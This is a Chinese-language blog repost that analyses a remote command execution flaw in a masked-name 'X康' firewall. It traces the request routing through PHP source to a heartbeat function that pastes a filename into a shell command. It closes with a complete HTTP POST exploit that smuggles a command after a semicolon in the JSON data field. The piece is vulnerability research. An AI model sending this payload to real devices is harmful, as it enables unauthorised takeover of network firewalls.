X康防火墙RCE分析

admin 2022年10月1日13:10:28安全文章评论15 views1523字阅读5分4秒阅读模式



 

X康防火墙RCE分析

  

        事情起因是我在xx星球中看到有师傅公开了X康防火墙漏洞,我自己手里也存了好几个月了,到现在应该也修的差不多了,索性把之前的分析发出来吧

X康防火墙RCE分析

        漏洞入口点:

X康防火墙RCE分析

        可以看到用的是Ext_Diret类中的run方法,然后全局搜索run方法,并且可以看到该类的路由为/directdata/direct/router

X康防火墙RCE分析


X康防火墙RCE分析

        先是37行的Ext_Direct_Request类中的factory方法,全局搜索factory,可以看到获取data的方法是利用php伪协议,这里要注意,外面有个json_decode函数,所以传参需要以json形式,这里先判断了有没有type tid action method传参,有的话就直接return

X康防火墙RCE分析


X康防火墙RCE分析

        然后我们查找getAction

X康防火墙RCE分析

        这段代码大致逻辑是先判断传没传action,action代表的是类,然后是method,这俩没有的话就直接抛出异常,然后判断

X康防火墙RCE分析

        可以看到第56行有一个getParam函数,这是request是传进run的参数

X康防火墙RCE分析


X康防火墙RCE分析

        可以看到这个Directdata_DirectController继承了Zend_Controller_Action

这个controller中找到getrequest函数,可以发现默认为空的

X康防火墙RCE分析


X康防火墙RCE分析

        然后抛出异常之后往下走

        然后注意下该函数用法

        call_user_func_array((类,方法),参数)

        获取类名赋值到dao,然后利用getMethod获取方法名和getArguments获取参数

X康防火墙RCE分析

        此时我们就可以调用到最终的漏洞点

        可以看到在NS_Rpc_HeartBeat类中的delTestFile函数 其中获取filename然后拼接cmd中

X康防火墙RCE分析

        Exec_cmd文件是啥呢,找到该文件

        Cmd获取到了环境变量ENV{‘CMD’}

X康防火墙RCE分析

        这段代码的意义呢?我在本地的linux进行了测试如下

        发现6,7行是可以删掉的,也能成功执行命令如下

X康防火墙RCE分析


X康防火墙RCE分析

        前面几句都还好理解,cmd赋值环境变量中的cmd,这个在上文的putenv已经可以看到了,然后是删除其他几个env并且路径重新赋值

$cmd=~m/(.*)/;$cmd=$1;

        第一个就是正则表达式进行匹配全文本,因为赋值过来的env是不能直接使用的,$1就是第一个小括号的匹配结果,例子如下

X康防火墙RCE分析

        最后整个漏洞数据包(type和tid中不空就行,随便填)

POST /directdata/direct/router HTTP/1.1Host: x.x.x.xContent-Type: application/jsonContent-Length: 113{"action":"NS_Rpc_HeartBeat","method":"delTestFile","data":["/var/www/tmp/1.txt;%s>%s.txt"],"type":"rpc","tid":11,"f8839p7rqtj":"="}

        这个RCE只是其一,整个源码审出来的不少于7个无条件RCE,后台RCE就更多了,不过基本原理一样,就不发出来赘述了



宣传页

ZAC安全

本人微信:zacaq999 
文章内容如有任何错误或者对不上号的,可以加我微信,感谢各位大佬们的指点

安全宝典欢迎各位大佬以投稿方式免费进入!


X康防火墙RCE分析





原文始发于微信公众号(ZAC安全):X康防火墙RCE分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月1日13:10:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  X康防火墙RCE分析 https://cn-sec.com/archives/1306537.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: